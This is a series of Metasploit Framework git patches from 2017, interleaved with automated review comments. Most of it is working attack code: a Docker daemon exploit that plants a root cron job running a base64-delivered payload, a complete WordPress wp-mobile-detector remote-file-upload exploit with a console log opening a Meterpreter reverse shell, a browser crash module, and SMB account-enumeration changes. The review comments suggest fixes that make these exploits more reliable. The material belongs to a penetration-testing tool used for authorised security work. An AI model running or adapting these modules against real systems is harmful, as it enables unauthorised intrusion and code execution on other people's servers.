set VERBOSE true 
@@ -108,18 +108,17 @@ msf exploit(docker_daemon_tcp) > run [*] Waiting for the cron job to run, can take up to 60 seconds [*] Waiting until the docker container stopped [*] The docker container has been stopped, now trying to remove it -[*] Sending stage (40411 bytes) to 192.168.66.23 +[*] Sending stage (2878936 bytes) to 192.168.66.23 [*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200 [+] Deleted /etc/cron.d/lVoepNpy [+] Deleted /tmp/poasDIuZ meterpreter > sysinfo -Computer : debian -OS : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) -Architecture : x64 -System Language : en_US -Meterpreter : python/linux +Computer : rancher +OS : Debian 9.1 (Linux 4.9.0-3-amd64) +Architecture : x64 +Meterpreter : x64/linux meterpreter > ``` diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index c733b2440c..069014ccdd 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb 
@@ -32,24 +32,17 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket'] ], 'DisclosureDate' => 'Jul 25, 2017', - 'Targets' => [ - [ 'Python', { - 'Platform' => 'python', - 'Arch' => ARCH_PYTHON, - 'Payload' => { - 'Compat' => { - 'ConnectionType' => 'reverse noconn none tunnel' - } - } - }] - ], - 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'Platform' => 'Linux', + 'Arch' => [ARCH_X64], + 'Payload' => { 'Space' => 65000 }, + 'Targets' => [[ 'Linux', {} ]], + 'DefaultOptions' => { 'WfsDelay' => 180 }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2375), - OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']) ] ) @@ -88,13 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote echo_cron_path = mnt_path + cron_path echo_payload_path = mnt_path + payload_path - cron_command = "python #{payload_path}" - payload_data = payload.raw - - command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " - command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " - command << "echo \"\" >> #{echo_cron_path} && " - command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" + command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& " + command << "echo \"\" >> #{echo_cron_path} \&\& " + command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}" command end From 33ec3c3d690212494635b961889ea8a2e6711539 Mon Sep 17 00:00:00 2001 
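Review bot: The new `DOCKERIMAGE` default `alpine:latest` is a floating tag, so the image the target pulls and then runs (as root, and presumably with the host filesystem mounted at `mnt_path`, which the rest of the module handles outside this hunk) is whatever Docker Hub happens to serve at exploit time; a pinned tag or an `image@sha256:...` digest makes runs reproducible and records exactly which image the operator is trusting on the target. The option text could carry that advice: `OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use (pin a tag or digest for reproducible runs)', 'alpine:latest' ])`. `'Payload' => { 'Space' => 65000 }` looks tied to the base64-on-a-command-line delivery introduced further down; a one-line comment naming that reason would keep someone from "fixing" the limit later.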
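Review bot: In the rewritten `command` the `\&\&` sequences inside a double-quoted Ruby string are simply `&&` (an unknown escape yields the character itself), so the backslashes add noise without changing the shell command; plain `&&`, as the removed lines used, reads cleaner. The entire base64-encoded ELF now travels as one shell word; with `Space` at 65000 the encoded form is roughly 87 KB, which stays under Linux's 128 KiB per-argument limit but nothing says so — a comment such as `# payload is base64-inlined as one argv word; keep Space well below MAX_ARG_STRLEN (128 KiB after encoding)` would record the constraint. Whether this string is actually run through `/bin/sh` (needed for the redirection and `&&`) depends on `make_container`, which is not in this hunk.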
From: Martin Pizala Date: Sun, 8 Oct 2017 13:51:16 +0200 Subject: [PATCH 023/254] Error handling and style --- modules/exploits/linux/http/docker_daemon_tcp.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index 069014ccdd..a9947c2811 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri('images', 'json') ) - return unless res and res.code == 200 and res.body.include? image_id + return unless res && res.code == 200 && res.body.include?(image_id) res end @@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) ) - return unless res.code == 200 + return unless res && res.code == 200 res end @@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - if res and res.code == 200 and res.headers['Server'].include? 'Docker' + if res && res.code == 200 && res.headers['Server'].include?('Docker') return Exploit::CheckCode::Vulnerable end @@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote # delete container deleted_container = false - if res_wait.code == 200 + if res_wait && res_wait.code == 200 vprint_status("The docker container has been stopped, now trying to remove it") del_container(container_id) deleted_container = true From 3f6f70f8208390acbf6f14531ed73bc7f25db9ce Mon Sep 17 00:00:00 2001 
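Review bot: In `check`, the new `res && res.code == 200 && res.headers['Server'].include?('Docker')` still raises `NoMethodError` when a 200 response carries no `Server` header (a reverse proxy in front of the daemon, or some other service listening on 2375), because the added guard only covers `res` itself; `res.headers['Server'].to_s.include?('Docker')` turns that case into "not Docker" instead of crashing the check. The `pull_image` change treats any 200 as a successful pull; as far as I recall the image-create endpoint streams progress JSON and reports a failed pull inside the body with the same 200 status, so scanning `res.body` for an `"error"` entry may be needed — worth confirming against the API version targeted.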
From: Spencer McIntyre Date: Sun, 8 Oct 2017 13:58:51 -0400 Subject: [PATCH 024/254] Move the cve-2017-8464 source to external/source --- data/exploits/cve-2017-8464/src/build.sh | 17 ----------------- external/source/exploits/cve-2017-8464/build.sh | 17 +++++++++++++++++ .../source/exploits/cve-2017-8464}/template.c | 0 .../source/exploits/cve-2017-8464}/template.def | 0 .../source/exploits/cve-2017-8464}/template.h | 0 .../source/exploits/cve-2017-8464}/template.rc | 0 6 files changed, 17 insertions(+), 17 deletions(-) delete mode 100755 data/exploits/cve-2017-8464/src/build.sh create mode 100755 external/source/exploits/cve-2017-8464/build.sh rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.c (100%) rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.def (100%) rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.h (100%) rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.rc (100%) diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh deleted file mode 100755 index 202daa5413..0000000000 --- a/data/exploits/cve-2017-8464/src/build.sh +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/sh -rm -f *.o *.dll - -CCx86="i686-w64-mingw32" -CCx64="x86_64-w64-mingw32" - -${CCx64}-gcc -m64 -c -Os template.c -Wall -shared -${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll -${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll -rm -f temp.dll *.o -chmod -x ../template_x64_windows.dll - -${CCx86}-gcc -c -Os template.c -Wall -shared -${CCx86}-dllwrap --def template.def *.o -o temp.dll -${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll -rm -f temp.dll *.o -chmod -x ../template_x86_windows.dll diff --git a/external/source/exploits/cve-2017-8464/build.sh b/external/source/exploits/cve-2017-8464/build.sh new file mode 100755 index 0000000000..c5eb5e5211 --- /dev/null 
+++ b/external/source/exploits/cve-2017-8464/build.sh @@ -0,0 +1,17 @@ +#!/bin/sh +rm -f *.o *.dll + +CCx86="i686-w64-mingw32" +CCx64="x86_64-w64-mingw32" + +${CCx64}-gcc -m64 -c -Os template.c -Wall -shared +${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll +${CCx64}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll +rm -f temp.dll *.o +chmod -x ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll + +${CCx86}-gcc -c -Os template.c -Wall -shared +${CCx86}-dllwrap --def template.def *.o -o temp.dll +${CCx86}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll +rm -f temp.dll *.o +chmod -x ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll diff --git a/data/exploits/cve-2017-8464/src/template.c b/external/source/exploits/cve-2017-8464/template.c similarity index 100% rename from data/exploits/cve-2017-8464/src/template.c rename to external/source/exploits/cve-2017-8464/template.c diff --git a/data/exploits/cve-2017-8464/src/template.def b/external/source/exploits/cve-2017-8464/template.def similarity index 100% rename from data/exploits/cve-2017-8464/src/template.def rename to external/source/exploits/cve-2017-8464/template.def diff --git a/data/exploits/cve-2017-8464/src/template.h b/external/source/exploits/cve-2017-8464/template.h similarity index 100% rename from data/exploits/cve-2017-8464/src/template.h rename to external/source/exploits/cve-2017-8464/template.h diff --git a/data/exploits/cve-2017-8464/src/template.rc b/external/source/exploits/cve-2017-8464/template.rc similarity index 100% rename from data/exploits/cve-2017-8464/src/template.rc rename to external/source/exploits/cve-2017-8464/template.rc From 6d28a579f304fdc551d5a3a53cd1612c4cb0a126 Mon Sep 17 00:00:00 2001 
From: Martin Pizala Date: Mon, 9 Oct 2017 13:12:48 +0200 Subject: [PATCH 025/254] send_request_cgi instead of send_request_raw --- .../exploits/linux/http/docker_daemon_tcp.rb | 30 +++++++++++-------- 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index a9947c2811..94b9787b48 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -50,9 +50,10 @@ class MetasploitModule < Msf::Exploit::Remote def check_image(image_id) vprint_status("Check if images exist on the target host") - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri('images', 'json') + 'uri' => normalize_uri('images', 'json'), + 'ctype' => 'application/json' ) return unless res && res.code == 200 && res.body.include?(image_id) @@ -61,9 +62,10 @@ class MetasploitModule < Msf::Exploit::Remote def pull_image(image_id) print_status("Trying to pulling image from docker registry, this may take a while") - res = send_request_raw( + res = send_request_cgi( 'method' => 'POST', - 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id), + 'ctype' => 'application/json' ) return unless res && res.code == 200 @@ -104,19 +106,21 @@ class MetasploitModule < Msf::Exploit::Remote end def del_container(container_id) - send_request_raw( + send_request_cgi( { 'method' => 'DELETE', - 'uri' => normalize_uri('containers', container_id) + 'uri' => normalize_uri('containers', container_id), + 'ctype' => 'application/json' }, 1 # timeout ) end def check - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('containers', 'json'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) 
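Review bot: `pull_image` now uses `send_request_cgi` but still splices the query string into the path with `'create?fromImage=' + image_id`; `send_request_cgi` takes `'vars_get'`, which URL-encodes the image reference (`:`, `@` and `/` in tags and digests) and keeps the `?` segment out of `normalize_uri`'s path handling: `'uri' => normalize_uri('images', 'create'), 'vars_get' => { 'fromImage' => image_id },`. The `'ctype' => 'application/json'` added to the body-less GET and DELETE calls in `check_image`, `del_container` and `check` sends a Content-Type with no content; it is harmless, but it reads as copy-paste from the POSTs and dropping it from those calls keeps the intent clear.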
@@ -151,10 +155,10 @@ class MetasploitModule < Msf::Exploit::Remote container_id = make_container_id # create container - res_create = send_request_raw( + res_create = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', 'create?name=' + container_id), - 'headers' => { 'Content-Type' => 'application/json' }, + 'ctype' => 'application/json', 'data' => make_container(mnt_path, cron_path, payload_path).to_json ) fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 @@ -163,19 +167,21 @@ class MetasploitModule < Msf::Exploit::Remote register_files_for_cleanup(cron_path, payload_path) # start container - send_request_raw( + send_request_cgi( { 'method' => 'POST', - 'uri' => normalize_uri('containers', container_id, 'start') + 'uri' => normalize_uri('containers', container_id, 'start'), + 'ctype' => 'application/json' }, 1 # timeout ) # wait until container stopped vprint_status("Waiting until the docker container stopped") - res_wait = send_request_raw( + res_wait = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', container_id, 'wait'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) From b83787c24c42bfe9a0d21f2ba0bc46bebe5bd6b5 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Mon, 9 Oct 2017 20:02:32 -0500 Subject: [PATCH 026/254] make powershell spec more specific in expectations --- spec/lib/msf/core/exploit/powershell_spec.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 402ee98d67..fbe38decdf 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb 
@@ -276,11 +276,13 @@ RSpec.describe Msf::Exploit::Powershell do end it 'shouldnt shorten args' do code = subject.cmd_psh_payload(payload, arch) - expect(code.include?('-NoProfile -WindowStyle hidden -Command')).to be_truthy + expect(code.include?('-NoProfile ')).to be_truthy + expect(code.include?('-WindowStyle hidden')).to be_truthy + expect(code.include?('-Command ')).to be_truthy end it 'should include -NoExit' do code = subject.cmd_psh_payload(payload, arch) - expect(code.include?('-NoProfile -WindowStyle hidden -NoExit -Command')).to be_truthy + expect(code.include?('-NoExit ')).to be_truthy end end From 2b85eb17dd4c78c53aa34d8e92ee9b7a8b0e16c6 Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 10 Oct 2017 12:22:06 +0530 Subject: [PATCH 027/254] Create ibm_lotus_notes2.rb --- .../auxiliary/dos/http/ibm_lotus_notes2.rb | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 modules/auxiliary/dos/http/ibm_lotus_notes2.rb diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb new file mode 100644 index 0000000000..aabd3b5041 --- /dev/null +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb 
@@ -0,0 +1,70 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "IBM Notes encodeURI DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + [ 'EXPLOIT-DB', '42604'], + [ 'CVE', '2017-1130' ] + ], + 'DisclosureDate' => 'August 31 2017', + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end From d715f5360452a9386bda39635fec186b1ad0e541 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 20 Oct 2017 15:32:25 -0500 Subject: [PATCH 028/254] add MinRID to complement MaxRID, allowing continuing or starting from a higher value from @lvarela-r7 --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 4d62a29ef2..05d8e86152 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -39,6 +39,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ + OptInt.new('MinRID', [ false, "Starting RID to check", 500 ]), OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) ], self.class 
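Review bot: `'DisclosureDate' => 'August 31 2017'` spells out the month while the other modules in this series use the abbreviated form; the framework's date handling and msftidy expect `%b %d %Y`, so this should read `'DisclosureDate' => 'Aug 31 2017'`. `on_request_uri` serves the page to every client for every path with no filtering, which is acceptable for a browser DoS module but deserves a comment, e.g. `# no client check: any browser that fetches this URI receives the crash page`, so nobody mistakes it for a targeted exploit. The `@html` body appears empty in this rendering, likely extraction stripping the markup, so the trigger itself cannot be reviewed here.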
@@ -140,7 +141,6 @@ class MetasploitModule < Msf::Auxiliary # Fingerprint a single host def run_host(ip) - [[139, false], [445, true]].each do |info| @rport = info[0] @@ -227,8 +227,10 @@ class MetasploitModule < Msf::Auxiliary domain_sid || host_sid end + min_rid = datastore['MinRID'] # Brute force through a common RID range - 500.upto(datastore['MaxRID'].to_i) do |rid| + + min_rid.upto(datastore['MaxRID']) do |rid| stub = phandle + @@ -244,7 +246,6 @@ class MetasploitModule < Msf::Auxiliary NDR.long(1) + NDR.long(0) - dcerpc.call(15, stub) resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil @@ -295,6 +296,4 @@ class MetasploitModule < Msf::Auxiliary end end end - - end From cfd7761818ded3e388328037817ecc87e3cbe653 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 20 Oct 2017 23:19:58 -0400 Subject: [PATCH 029/254] wp_mobile_detector rce --- .../wp_mobile_detector_upload_execute.md | 63 ++++++++++ .../wp_mobile_detector_upload_execute.rb | 118 ++++++++++++++++++ 2 files changed, 181 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md create mode 100644 modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb diff --git a/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md new file mode 100644 index 0000000000..5443e074ee --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md 
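Review bot: Nothing checks that `MinRID` does not exceed `MaxRID`, so `min_rid.upto(datastore['MaxRID'])` in the `@@ -227,8 +227,10 @@` hunk silently iterates zero times and the host looks as if no accounts exist; the option added in the first hunk of this file (`@@ -39,6 +39,7 @@`) accepts any integer, including negatives. A guard before the loop, `return print_error('MinRID must not exceed MaxRID') if min_rid > datastore['MaxRID']`, makes the misconfiguration visible (or use `fail_with(Failure::BadConfig, ...)` if that is preferred in scanner modules). The added blank `+` line leaves the comment `# Brute force through a common RID range` separated from the loop it describes; keep the comment directly above `min_rid.upto`. `run_host` starts and ends outside these hunks.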
@@ -0,0 +1,63 @@ +## Vulnerable Application + + wp-mobile-detector is a wordpress plugin which was removed from the wordpress site after this vulnerability + was disclosed. Version 3.5 and earlier can be directed to upload a file from a remote web server, and then + the file can be executed by the client. + + Download [wp-mobile-detector](https://www.exploit-db.com/apps/bf8bdbac0b01e14788aa2d4a0d9c6971-wp-mobile-detector.3.5.zip) + from Exploit-db since wordpress removed it. + + Due to its age, it may be difficult to install. The install for the scenario later is: + + * Ubuntu 16.04.2 + * Apache 2.4.18 + * PHP 7 + * Wordpress 4.4.2 + +## Verification Steps + + Example steps in this format (is also in the PR): + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute``` + 4. Do: ```set rhost [ip]``` + 5. Do: ```set lhost [ip]``` + 6. Do: ```set srvhost [ip]``` + 7. Do: ```exploit``` + 8. You should get a shell. + +## Scenarios + +### wp-mobile-detector 3.5 on Wordpress 4.4.2 + + ``` + msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute + msf exploit(wp_mobile_detector_upload_execute) > set rhost 2.2.2.2 + rhost => 2.2.2.2 + msf exploit(wp_mobile_detector_upload_execute) > set TARGETURI /wordpress/ + TARGETURI => /wordpress/ + msf exploit(wp_mobile_detector_upload_execute) > check + [*] 2.2.2.2:80 The target appears to be vulnerable. + msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp + payload => php/meterpreter/reverse_tcp + smsf exploit(wp_mobile_detector_upload_execute) > set lhost 1.1.1.1 + lhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > set srvhost 1.1.1.1 + srvhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > exploit + [*] Exploit running as background job 2. 
+ + [*] Started reverse TCP handler on 1.1.1.1:4444 + msf exploit(wp_mobile_detector_upload_execute) > [*] Starting Payload Server + [*] Using URL: http://1.1.1.1:8080/ZWTgqwsiFL.php + [*] Uploading payload via /wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src=http://1.1.1.1:8080/ZWTgqwsiFL.php + [+] Payload requested on server, sending + [+] Sleeping 5 seconds for payload upload + [*] Executing the payload via /wordpress/wp-content/plugins/wp-mobile-detector/cache/ZWTgqwsiFL.php + [*] Sending stage (37514 bytes) to 2.2.2.2 + [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47064) at 2017-10-20 22:54:04 -0400 + [+] Deleted ZWTgqwsiFL.php + [*] Server stopped. + ``` + diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb new file mode 100644 index 0000000000..ae2f4fa7ad --- /dev/null +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb 
@@ -0,0 +1,118 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP Mobile Detector 3.5 Shell Upload', + 'Description' => %q{ + WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker + to execute arbitrary PHP code. This flaw exists because the + /wp-content/plugins/wp-mobile-detector/resize.php script does contains a + remote file include for files not cached by the system already. + By uploading a .php file, the remote system will + place the file in a user-accessible path. Making a direct request to the + uploaded file will allow the attacker to execute the script with the privileges + of the web server. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'pluginvulnerabilities.com', # Vulnerability disclosure + 'Aaditya Purani', # EDB module discovered after writing module + 'h00die' # Metasploit module + ], + 'References' => + [ + ['WPVDB', '8505'], + ['EDB', '39891'], + ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'] + ], + 'DisclosureDate' => 'May 31 2016', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-mobile-detectory < 3.6', {}]], + 'DefaultTarget' => 0 + )) + end + + def check + check_plugin_version_from_readme('wp-mobile-detector', '3.5') + end + + def exploit + if datastore['SRVHOST'] == '0.0.0.0' + fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost') + end + payload_name = rand_text_alphanumeric(10) + '.php' + + # First check to see if the file is written already, if it is cache wont retrieve it from us + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' + ) + if res and !res.body.include?(payload_name) + vprint_status("#{payload_name} verified as not written.") + else + fail_with(Failure::BadConfig,"#{payload_name} already written on system.") + end + + def on_request_uri(cli, _request) + print_good('Payload requested on server, sending') + send_response(cli, payload.encoded, {}) + end + + print_status('Starting Payload Server') + payload_url = '/' + payload_name + start_service('Uri' => { + 'Path' => payload_url, + 'Proc' => proc do |cli, req| + on_request_uri(cli, req) + end + }) + + payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url + print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}") + + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => 
normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'), + 'vars_get' => {'src' => payload_full_url} + ) + + if res && res.code == 200 + print_good('Sleeping 5 seconds for payload upload') + register_files_for_cleanup(payload_name) + + select(nil,nil,nil,5) + + print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}") + send_request_cgi( + { + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), + }) + # wait for callback, without this we exit too fast and miss our shell + select(nil,nil,nil,2) + handler + else + if res.nil? + fail_with(Failure::Unreachable, 'No response from the target') + else + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") + fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') + end + end + end +end From ea1ac3d5b3737b60b33769d543a28e10bb2d7b0b Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 20:39:38 -0700 Subject: [PATCH 030/254] #9108: added -C option to change default hosts columns The -C option saves the column list the user provided and uses that as the default column list until msfconsole is restarted --- lib/msf/ui/console/command_dispatcher/db.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index e37a16a350..74f2cf3f17 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -354,6 +354,8 @@ class Db end end + @@hosts_columns = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments'] + def cmd_hosts(*args) return unless active? ::ActiveRecord::Base.connection_pool.with_connection { 
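Review bot: `def on_request_uri` is declared inside `exploit`, so every run redefines an instance method of the module class (Ruby warns about the redefinition) and the handler is hidden from anyone reading the class; move it to class level next to `check` and keep passing it to `start_service` as today. The pre-flight check on the cache directory fails with `Failure::BadConfig, "#{payload_name} already written on system."` whenever `res` is nil, i.e. when the target did not answer at all, which is the wrong diagnosis; add `fail_with(Failure::Unreachable, 'No response from the target') if res.nil?` before the `include?` test, or drop the check entirely since a freshly generated random name is essentially never in the listing. Minor: the target name `'wp-mobile-detectory < 3.6'` has a typo, `res and !res.body.include?` should use `&&`, and `select(nil,nil,nil,5)` is conventionally written `Rex.sleep(5)`.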
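Review bot: `@@hosts_columns` is a class variable, so the `-C` default is shared by every `Db` dispatcher instance in the process rather than belonging to the console session the help text describes; a class instance variable with an accessor, or an instance variable initialised lazily in `cmd_hosts` (`@hosts_columns ||= [...]`), gives the intended lifetime without the shared-state surprise. In the hunk at `@@ -371,7 +373,7 @@`, `col_search = @@hosts_columns` hands out the stored array itself rather than a copy, so any later in-place mutation of `col_search` (not visible here) would silently change the persisted default — `col_search = @@hosts_columns.dup` avoids that. A one-line comment on the declaration, `# Columns shown by 'hosts' when -c is not given; replaced by -C for the rest of the session`, would document the new state. `cmd_hosts` continues outside the hunk.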
@@ -371,7 +373,7 @@ class Db default_columns << 'tags' # Special case virtual_columns = [ 'svcs', 'vulns', 'workspace', 'tags' ] - col_search = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments'] + col_search = @@hosts_columns default_columns.delete_if {|v| (v[-2,2] == "id")} while (arg = args.shift) @@ -380,7 +382,7 @@ class Db mode << :add when '-d','--delete' mode << :delete - when '-c' + when '-c','-C' list = args.shift if(!list) print_error("Invalid column list") @@ -394,6 +396,10 @@ class Db return end } + if (arg == '-C') + @@hosts_columns = col_search + end + when '-u','--up' onlyup = true when '-o' @@ -426,6 +432,7 @@ class Db print_line " -a,--add Add the hosts instead of searching" print_line " -d,--delete Delete the hosts instead of searching" print_line " -c Only show the given columns (see list below)" + print_line " -C Only show the given columns until next restart (see list below)" print_line " -h,--help Show this help information" print_line " -u,--up Only show hosts which are up" print_line " -o Send output to a file in csv format" From 8d035ccd401fdc257ce20f47fa8f224035345178 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:10:56 -0700 Subject: [PATCH 031/254] #9108: fixed broken unit test --- db_spec.rb | 389 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 389 insertions(+) create mode 100644 db_spec.rb diff --git a/db_spec.rb b/db_spec.rb new file mode 100644 index 0000000000..7bccc9b9cc --- /dev/null +++ b/db_spec.rb 
